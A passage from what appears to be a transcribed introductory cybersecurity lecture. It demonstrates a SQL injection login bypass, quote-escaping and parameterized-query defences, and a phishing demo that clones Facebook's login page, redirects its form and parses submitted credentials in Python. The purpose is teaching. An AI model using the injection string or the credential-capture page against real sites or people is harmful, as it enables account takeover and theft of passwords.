Enter, then I end up with SELECT star
from users where username equals Doug
and password equals 1 or 1 equals 1.
And the latter part of that is true.
The former part is false.
But it's good enough that
I would be able to log in
if I did something like that.
But we want to try and get around that.
So now let's take a look at a second
file that might solve this problem.
So I'm going to open up
login2.py in my editor here.
So now it starts out exactly the same,
x equals something, y equals something.
But I'm making a pretty
basic substitution.
I'm replacing every time that I see
single quotes with double quotes.
So I'm replacing every
instance of single quote,
and I have to preface
it with a backslash.
Because notice I'm actually using
single quotes to identify the character.
It just so happens that it's to indicate
that I'm trying to substitute something
which I'm putting in single quotes.
The thing I'm trying to substitute
actually is a single quote,
and so I need to put a
backslash in front of it
to escape that character
such that it actually
gets treated as a single quotation
mark character as opposed
to some special Python--
Python's not going to try and
interpret it in some other way.
So I want to replace every instance of
a single quote in x with a double quote,
and I want to replace every
instance of a single quote in y
with a double quote.
Now, why do I want to do that?
Because notice in my
actual Python string here
I'm using single quotes to set
off the variables for purposes
of SQL's interpretation of them.
So where the user name
equals this string,
I'm using single quotes to do that.
So if my username or my password
also contained single quotation mark
characters, when SQL
was interpreting it,
it might think that the next single
quote character it sees is the end.
I'm done with what I've prompted.
And that's exactly how I tricked
it in the previous example.
I used that first single quote,
which seemed kind of random and out
of nowhere, to trick SQL into
thinking I'm done with this.
Then I used the keyword or, now back in SQL and not some string
that I'm searching for, and then I
would continue this trick going forward.
So this is designed to
eliminate all the single quotes,
because the single quotes
mean something very special
in the context of my SQL query itself.
If you're actually using SQL
libraries that are tied into Python,
the ability to replace things is
much more robust than this example.
But even this very
simple example where I'm
doing just this very basic
substitution is good enough
to get around the injection
attack that we just looked at.
So this is now in login2.py.
Let's do this.
Let's Python login2.py.
And we'll start out the same way.
We'll do Doug and 12345.
And it appears that nothing has changed.
The behavior is otherwise
identical because I'm not
trying to do any tricks like that.
SELECT star from users where username
equals Doug and password equals 12345.
But if I now try that same
trick that I did a moment ago,
so password is 1' or '1'
equals '1 and I hit Enter,
now I'm not subject to that same SQL
injection anymore because I'm trying
to select all the information from the
users table where the username is Doug
and the password equals--
And notice that here is
the first single quote.
Here is the second one.
So it's thinking that entire
thing now is the password.
Only if my password were literally 1" or "1" equals "1 would I actually be logging in.
If that happened to be my
password, this would work.
But otherwise I've escaped.
I've stopped the adversary
from being able to leverage
a simple trick like this
to break in to my database
when perhaps they're
not intended to do so.
And again, in actual SQL injection
defense, the substitutions that we make
are much more complicated than this.
We're not just looking for single quote
characters and double quote characters,
but we're considering semicolons
or any other special characters
that SQL would interpret
as part of a statement.
We can escape those out so
that users could literally
use single quotes or semicolons
or the like in their passwords
without necessarily compromising
the integrity of the entire database
overall.
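The more robust approach that real SQL libraries provide is the parameterized query: rather than pasting values into the query string, you hand them to the driver, which binds them as data. As one illustration (sqlite3 is chosen here for the example; the lecture doesn't name a specific library):

```python
import sqlite3

# Set up a throwaway in-memory database with one user.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('doug', '12345')")

def login(conn, uname, pword):
    # The ? placeholders mean the driver binds uname and pword as
    # values; injected quotes are treated as literal characters,
    # never as SQL.
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (uname, pword),
    ).fetchall()
    return len(rows) > 0

print(login(conn, "doug", "12345"))         # True
print(login(conn, "doug", "1' OR '1'='1"))  # False: the injection is inert
```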
So we've taken a look at several of
the most common, most obvious ways
that an adversary might be
able to extract information
either from a business or an individual.
And these ways are kind of
attention-getting in some context.
But let's focus now-- let's
go back and bring things
full circle to something
I've mentioned many times,
which is humans are the core fatal
flaw in all of these security things
that we're dealing with here.
And so let's bring things
full circle by talking
about phishing, what phishing is.
So phishing is just an attempt
by an adversary to prey upon us
and our unfortunate general ignorance
of basic security protocols.
So it's just an attempt
to socially engineer,
basically, information out of someone.
You pretend to be
someone that you are not.
And if you do so
convincingly enough, you
might be able to extract
information about that person.
Now, you'll also see phishing in other contexts; computer scientists like to be clever with their wordplay.
You'll see things like netting, which
is basically a phishing attack that
launches against many
people at once, hoping
they'll be able to get one or two.
There's spear phishing,
which is a phishing
attack that targets one specific person
trying to get information from them.
And then there's whaling,
which is a phishing attack that
is targeted against somebody who is
perceived to have a lot of information
or whose information is
particularly valuable such
that you'd be phishing
for some big whale.
Now, one of the most obvious and
easy types of phishing attack
looks like this.
It's a simple URL substitution.
This is how we can write a link in HTML.
A is the HTML tag for anchor,
which we use for hyperlinks.
Href is where we are going to.
And then we also have the ability to
specify some text at the end of that.
These two items do not have
to match, as you can see here.
I can say we're going to URL2
but actually send you to URL1.
This is an incredibly common way
to get information from somebody.
They think they're going one place but
they're actually going someplace else.
And to show you, as a very
basic example, just how easy it
is to potentially trick somebody into
going somewhere they're not supposed to
and potentially then
revealing credentials as well,
let's just take a simple
example here with Facebook.
And why don't we just take a moment
to build our own version of Facebook
and see if we can't get somebody to
potentially reveal information to us?
So let's imagine that I
have acquired some domain
name that's really
similar to Facebook.com,
like it's off by one character, a common typo. For example, maybe people mistype the A or hit an adjacent key, something that would not necessarily be obvious to somebody at the outset.
One way that I might be able to just
take advantage of somebody's thinking
that they're logging into
Facebook is to make a page that
looks exactly the same as Facebook.
That's actually not
very difficult to do.
All you have to do is
open up Facebook here.
And because its HTML is available
to me, I can right click on it,
view page source, take
a second to load here--
Facebook is a pretty big site--
and then I can just select all with Control-A, copy all of the content, and paste it into my index.html, and we will save.
And then we'll head back
into our terminal here,
and I will start Chrome on
the file index.html, which
is the file that I literally just
saved my Facebook information in.
So start Chrome index.html.
You'll notice that it
brings me to this URL
here, which is the path to where this file currently lives on my machine.
And this page looks like Facebook,
except for the fact that,
when I log in, I then
get redirected back
to something that actually is Facebook
and is not something that I control.
But at the outset, my page
here at the very beginning
looks identical to Facebook.
Now, the trick here
would be to do something
so that the user would provide
information here in the email box
and then here in the password field
such that when they click Login,
I might be able to get
that information from them.
Maybe I just am waiting to
capture their information.
So the next step for me might be to go
back into my random set of stuff here.
There's a lot of random code
that we don't really care about.
But the one thing I do care
about is what happens when
somebody clicks on this Login button.
That is interesting to me.
So I'm going to go through
this and just do control F,
control F just being
find, the string login.
That's the text that's
literally written on the button,
so hopefully I'll find that somewhere.
I'm told I have eight results.
So this is, if I just
kind of look around
for context to try
and figure out where I
am in the code, the title of
something, so that's probably not it.
So I don't want to go there.
Create an account or login,
not quite what I'm looking for.
So go the next one.
OK, here we go, input
value equals login.
So now I found an input
that is called login.
So this is presumably a button
that's presumably part of some form.
So if I scroll up a little
bit higher, hopefully I
will find a form, which I do, form ID.
And it has an action.
The action is to go to
this particular page,
facebook.com/login/ and so on and so on.
But maybe I want to
send it somewhere else.
So if I replace this entire URL with
where I actually want to send the user,
where maybe I'm going to
capture their information,
maybe I'll store this in login.html.
And so that's what's
going to come in here.
And then we'll save the file such
that our changes have been captured.
So presumably what should
happen is now, when
you click on the Login
button in my fake Facebook,
you instead get redirected to login.html
rather than the Facebook actual login
as we saw just a moment ago.
So let's try again.
We'll go back here to
our fake Facebook page.
We will refresh so that
we get our new content.
Remember, we just
changed the HTML content,
so we actually need to reload
it so that our browser has it.
And we'll type in abc@cs50.net and then
some password here and click Login,
and we get redirected here.
Sorry, we are unable to
log you in at this time.
But notice we're still
in a file that I created.
I didn't show you login.html, but
that's exactly what I put there.
Now, I'm not actually going
to phish for information here.
And even though I'm using fake data here, I'm not going to do anything that would violate the terms of service or get myself in trouble by actually attempting to do some phishing.
But imagine instead of some HTML
I had some Python code that was
able to read the data from that field.
We saw that a moment ago
with passwords, right?
We know that the possibility exists
that if the user types something
into a field, we have the
ability to extract it.
What I could do here is very simple.
I could just read those two fields where
they typed a username and a password
but then display this content.
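As a sketch of how that capture step might work on the server side, here's a small function that parses a submitted login form body. The field names "email" and "pass" are assumptions for illustration; a real attacker would match whatever names the copied form actually uses:

```python
from urllib.parse import parse_qs

def capture_credentials(form_body):
    # Parse the URL-encoded form body the browser submits and pull
    # out the two fields the victim typed.
    fields = parse_qs(form_body)
    email = fields.get("email", [""])[0]
    password = fields.get("pass", [""])[0]
    # A real phishing page would quietly save these to a file here,
    # then show a generic "unable to log you in" error page.
    return email, password

print(capture_credentials("email=abc%40cs50.net&pass=12345"))
# ('abc@cs50.net', '12345')
```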
Perhaps it's been the case that
you've gone to some website
and seen, oh, yeah, sorry, the server
can't handle this request right now,
or something along those lines.
And you maybe think nothing of it.
Or maybe I even would then have
a link here that says, try again.
And if you click Try Again,
it would bring you back
to Facebook's actual login where you
would then enter your credentials
and try again and perhaps
think everything was fine.
But if on this login page I had
extracted your username and password
by tricking you into thinking
you were logging into Facebook,
and then maybe I save those
in some file somewhere
and then just display this to you,
you think, ah, they just had an error.
Things are a little bit busy.
I'll try again.
And when you try again, it works.
It's really that easy.
And the way to avoid phishing
expeditions, so to speak,
are just to be mindful
of what you're doing.
Take a look at the URL bar to
make sure that you're on the page
that you think you're on.
Hopefully you've come
away now with a bit more
of an understanding of
cybersecurity and some
of the best practices that
are put in place to deal
with potential cybersecurity threats.
Now it's incumbent upon
us to use the technology
that we have available to help us
protect ourselves from ourselves,
but not only ourselves and our own data,
but also working to protect our clients
and their data as well.
